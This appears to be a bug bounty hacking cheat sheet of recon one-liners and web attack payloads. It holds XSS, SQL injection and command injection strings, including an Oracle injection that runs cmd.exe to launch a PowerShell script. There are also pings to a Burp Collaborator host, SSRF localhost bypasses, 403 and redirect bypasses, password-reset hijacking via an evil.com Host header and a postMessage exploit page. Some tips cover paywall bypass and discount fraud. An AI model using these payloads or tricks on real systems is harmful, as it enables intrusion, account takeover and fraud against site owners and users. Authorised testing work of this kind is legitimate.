Google the company copyright footer to get more domains. Use whoxy.com to perform reverse whois lookups with the email used to register the main domain/ Search for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints. Use OpenSSL to get certificates. They can contain valuable info and common names form finding more subdomains. Try to recreate data from deleted accounts by siging up with the old email address. Check text version of HTML e-mail for template injections When testing Rails Application add .json to url endpoints. cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into|DB_USER|DB_PASSWORD" folder/ 

sublist3r -d $1 -o $1.txt mkdir thirdlevel echo "Gathering full third-level domain with sublister" for domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u >> final.txt; done echo "Probing for alive third-levels..." cat final.txt | httprobe > probed.txt 

cat GREPABLENMAP.gnmap | grep 443/open | cut -d "(" -f 1 | cut -d : -f 2| tr -d " " | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew 

cat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew 

cat * | jq | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl" | grep -v "FUZZ" | cut -d \" -f4 

go install -v github.com/punishell/gofinder@v0.1.1 echo example.com | assetfinder | httprobe| subjs | gofinder 

Use exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators Use cloud_enum to find open google buckets or azure accounts Use Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+' Use WayBackmachine combined with paraminer or parameth Passive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey Burp Collaborator alternative https://app.interactsh.com/#/ 

Inject payloads in parameter names, ?<script>alerty</script>=true Use youtube(olx, etc...) videos with xss in names. Use round brackets to inject payload into valid e-mail address. X-Forwarded-For: ${payload} Use longstring parameters for stacktrace. WAFBYPASS ?page=";confirm`1`// Rightwards -> 302; ?pag%65=";confirm`1`// Rightwards -> 200 + XSS! Redirect bypass %26next=http://example.com When testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path Add [] to name of parrameter: pwd= ->pwd[]= when interacting with db try to put % in parameter ?item=% exiftool -Comment="\"><script>alert(prompt('XSS '))</script>" image.jpg 

UUID Idor Trick, Register user with the same name, it maybe return uuid. Try to bruteforce login endpoint. /login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo 403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200, Bypass paywalls by using Google Bot user agent. User securitytrails.com to find the originating server IP Do match and replace form false to true. Set your birthday for today ot tomorrow to get discounts. Skip steps: /step/shipping -> ~~/step/payment~~ -> /step/confirm Check does blackfriday coupon codes expires. Use blind xss as password. Login to site using Facebook and try tochange userid during POST requests /api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200 

inti(;inti@inti.io;)@whitelisted.com → inti(; → inti@inti.io → my inbox! → ;)@whitelisted.com ● inti@inti.io(@whitelisted.com) ● inti+(@whitelisted.com;)@inti.io 

test+(<script>alert(1)</script>)@example.com test@example(<script>alert(1)</script>).com "<script>alert(1)</script>"@example.com "<%=7*7%>"@example.com test+(${{7*7}})@example.com "'OR 1=1--"@example.com "mail');DROP TABLE users;--"@example.com test@example.burpcollaborator.net test@[127.0.0.1] victim&email=attacker@example.com "%0d%0aContent-Lenght:%200@0d%0a%0d%0a"@example.com"recipient@test.com>\r\nRCPT TO:<victim+"@test.com 

GET /passwordreset Double parameter (aka. HPP / HTTP parameter pollution): email=victim@xyz.tld&email=hacker@xyz.tld Carbon copy: email=victim@xyz.tld%0a%0dcc:hacker@xyz.tld Using separators: email=victim@xyz.tld,hacker@xyz.tld email=victim@xyz.tld%20hacker@xyz.tld email=victim@xyz.tld|hacker@xyz.tld No domain: email=victim No TLD (Top Level Domain): email=victim@xyz JSON table: {"email":["victim@xyz.tld","hacker@xyz.tld"]} 

reset userpassword: user@email.com.burpcolaborator.com 

assetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done 

/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'"||ping -c 2 example.com||"/*`*/ /*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1``*/-echo 1 >/tmp/rce1-'/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1` #*/-echo 1 >/tmp/rce1||'"||echo 1 >/tmp/rce1||"/*`*/ |echo lol2137||a #' |echo lol2137||a #|" |echo lol2137||a # ||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 ||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\" |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net ||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\" |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net $(sleep 21) 

http://127.1/ http://0000::1:80/ http://[::]:80/ http://2130706433/ http://whitelisted@127.0.0.1 http://0x7f000001/ http://017700000001 http://0177.00.00.01 

?dest={target} ?redirect={target} ?uri={target} ?path={target} ?continue={target} ?url={target} ?window={target} ?next={target} ?data={target} ?reference={target} ?site={target} ?html={target} ?val={target} ?validate={target} ?domain={target} ?callback={target} ?return={target} ?page={target} ?feed={target} ?host={target} ?port={target} ?to={target} ?out={target} ?view={target} ?dir={target} 

?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload} ?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload} ?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload} 

?cat={payload} ?dir={payload} ?action={payload} ?board={payload} ?date={payload} ?detail={payload} ?file={payload} ?download={payload} ?path={payload} ?folder={payload} ?prefix={payload} ?include={payload} ?page={payload} ?inc={payload} ?locate={payload} ?show={payload} ?doc={payload} ?site={payload} ?type={payload} ?view={payload} ?content={payload} ?document={payload} ?layout={payload} ?mod={payload} ?conf={payload} 

/[redirect] ?targetOrigin=[redirect] ?fallback=[redirect] ?query=[redirect] ?redirection_url=[redirect] ?next=[redirect] ?ref_url=[redirect] ?state=[redirect] ?l=[redirect] ?redirect_uri=[redirect] ?forum_reg=[redirect] ?return_to=[redirect] ?redirect_url=[redirect] ?return_url=[redirect] ?host=[redirect] ?url=[redirect] ?redirectto=[redirect] ?return=[redirect] ?prejoin_data=[redirect] ?callback_url=[redirect] ?path=[redirect] ?authorize_callback=[redirect] ?email=[redirect] ?origin=[redirect] ?continue=[redirect] ?domain_name=[redirect] ?redir=[redirect] ?wp_http_referer=[redirect] ?endpoint=[redirect] ?shop=[redirect] ?qpt_question_url=[redirect] ?checkout_url=[redirect] ?ref_url=[redirect] ?redirect_to=[redirect] ?succUrl=[redirect] ?file=[redirect] ?link=[redirect] ?referrer=[redirect] ?recipient=[redirect] ?redirect=[redirect] ?u=[redirect] ?hostname=[redirect] ?returnTo=[redirect] ?return_path=[redirect] ?image=[redirect] ?requestTokenAndRedirect=[redirect] ?retURL=[redirect] ?next_url=[redirect] 

#!/bin/bash # $1 => example.domain subfinder -d $1 -o domains_subfinder_$1 amass enum --passive -d $1 -o domains_$1 cat domains_subfinder_$1 | tee -a domains_$1 cat domains_$1 | filter-resolved | tee -a domains_$1.txt cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt 

TBA echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew 

site:example.com inurl:.cgi? 

ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE SVG: Stored XSS / SSRF / XXE GIF: Stored XSS / SSRF CSV: CSV injection XML: XXE AVI: LFI / SSRF HTML / JS : HTML injection / XSS / Open redirect PNG / JPEG: Pixel flood attack (DoS) ZIP: RCE via LFI / DoS PDF / PPTX: SSRF / BLIND XXE 

../../../tmp/lol.png —> for path traversal sleep(10)-- -.jpg —> for SQL injection <svg onload=alert(document.domain)>.jpg/png —> for XSS ; sleep 10; —> for command injections 

echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript' or cat domains | httpx -silent | subjs | anew 

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u 

https://target.com/admin/ –> HTTP 302 (redirect to login page) https://target.com/admin..;/ –> HTTP 200 OK https://target.com/../admin https://target.com/whatever/..;/admin site.com/secret –> HTTP 403 Forbidden site.com/secret/ –> HTTP 200 OK site.com/secret/. –> HTTP 200 OK site.com//secret// –> HTTP 200 OK site.com/./secret/.. –> HTTP 200 OK X-Original-URL: /admin X-Override-URL: /admin X-Rewrite-URL: /admin /accessible/..;/admin /.;/admin /admin;/ /admin/~ /./admin/./ /admin?param /%2e/admin /admin# 

Here’s a tip to achieve sensitive data leak using .json extension. Request: GET /ResetPassword HTTP/1.1 {"email":"victim@example.com"} Response: HTTP/1.1 200 OK Now let’s try this instead: Request: GET /ResetPassword.json HTTP/1.1 {"email":"victim@example.com"} Response: HTTP/1.1 200 OK {"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"} 

echo "bugcrowd.com" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:&#]/\\n/g' | anew 

/?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' 

1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) >71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual -- 1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c type C:\\users\\public\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=>''myjob11'',program_name=>''exec4'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''exec4'');dbms_scheduler.purge_log;'), null FROM DUAL -- 1' AND 1=1 UNION SELECT null, user FROM DUAL -- 

Autorize – To test BACs (Broken Access Control) Burp Bounty – Profile-based scanner Active Scan++ – Add more power to Burp’s Active Scanner AuthMatrix – Authorization/PrivEsc checks Broken Link Hijacking – For BLH (Broken Link Hijacking) Collaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery) Command Injection Attacker Content-Type Converter – Trying to bypass certain restrictions by changing Content-Type Decoder Improved – More decoder features Freddy – Deserialization Flow – Better HTTP history Hackvertor – Handy type conversion HTTP Request Smuggler Hunt – Potential vuln identifier InQL – GraphQL Introspection testing J2EE Scan – Scanning J2EE apps JSON/JS Beautifier JSON Web Token Attacker ParamMiner – Mine hidden parameters Reflected File Download Checker Reflected Parameter – Potential reflection SAML Raider – SAML testing Upload Scanner – File upload tester Web Cache Deception Scanner 

cat urls.txt | python3 favfreak.py -o output 

(1) Normal request: Request: POST /password-reset?user=123 HTTP/1.1 Host: target.com Link received: https://target.com/reset-link=1g2f3guy23g (2) Basic HHI (Host Header Injection): Request: POST /password-reset?user=123 HTTP/1.1 Host: evil.com Link received: none Error 404 - request blocked (3) Bypass technique: Request: POST https://target.com/password-reset?user=123 HTTP/1.1 Host: evil.com Link received: https://evil.com/reset-link=1g2f3guy23g 

echo 192.168.69.69 | cero 

Vulnerable PostMessage <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> <script> window.addEventListener("message", (event) => { console.log(event.data); $(event.data) }, false); </script> Exploit <!DOCTYPE html> <html> <head> </head> <body> <script> var myWindow = window.open("http://example.com/test.html") </script> <script> setInterval(function(){myWindow.postMessage("<img src=x onerror=alert(123);>","*");},3000); window.onmessage = function (e) { console.log(e); }; </script> </body> </html> 

https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ https://github.com/tyranid/ExploitRemotingService https://github.com/nccgroup/VulnerableDotNetHTTPRemoting https://github.com/pwntester/ysoserial.net/blob/master/README.md https://nickbloor.co.uk/2018/02/28/popping-wordpress/ 

https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/ http://bit.ly/2NDZc73 

https://www.youtube.com/watch?v=HrJW6Y9kHC4 

cat hosts.live | gau -b ttf,woff,svg,png,jpg,gif,css,jpeg,pdf,zip,gz | tee -a hosts.gau 

cat hosts.httprobe | getJS --complete | tee -a hosts.httprobe.js cat hosts.httprobe | gau | tee -a hosts.httprobe.gau cat hosts.httprobe.gau |grep -iE '\.js'|grep -ivE '\.json'|sort -u >> hosts.httprobe.js # cat hosts.httprobe.gau | unfurl format %s://%d%p |grep -iE '\.js'|grep -ivE '\.json'|sort -u cat hosts.httprobe.js | sort -u >> hosts.httprobe.js.sorted cat hosts.httprobe.js.sorted|cut -d \? -f1 | sort -u | httpx -mc 200 | tee -a hosts.httprobe.js.sorted.200 cat hosts.httprobe.js.sorted.200 | httpx -silent -sr -mc 200 

cat hosts.httprobe | gau | tee -a hosts.httprobe.gau cat hosts.httprobe.gau | unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl cat hosts.httprobe.gau.unfurl | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.200 cat hosts.httprobe.gau.unfurl.200 | dalfox pipe -o hosts.httprobe | tee -a hosts.httprobe.gau.unfurl.200.dalfox 

cat hosts.httprobe | cut -d / -f 3 |gau -b css,png,jpeg,jpg,svg,gif,wolf,pdf,txt,ptt,gz,zip,csv | tee -a hosts.httprobe.gau cat hosts.httprobe.gau | grep -E 'asp|aspx|cgi|jsp|php|sql'| unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl.ext for i in `cat hosts.httprobe.gau.unfurl.ext`; do grep $i hosts.httprobe.gau | grep \? | head -n1 | tee -a hosts.httprobe.gau.unfurl.ext.filtred ; done cat hosts.httprobe.gau.unfurl.cgi.filtred | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.cgi.filtred.200 

for i in `cat hosts.httprobe.filtred `; do ffuf -w /payloads/free-kill.txt -u $i/FUZZ -of json -o qh-output/`echo $i | cut -d / -f3` -mc 200 -fl 1 -ac ; done for i in `ls qh-output/`; do cat qh-output/$i | python -m json.tool | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl" | grep -v "FUZZ" | cut -d \" -f4 >> qh-urls.txt;done 

https://regex-generator.olafneumann.org/ https://regex101.com/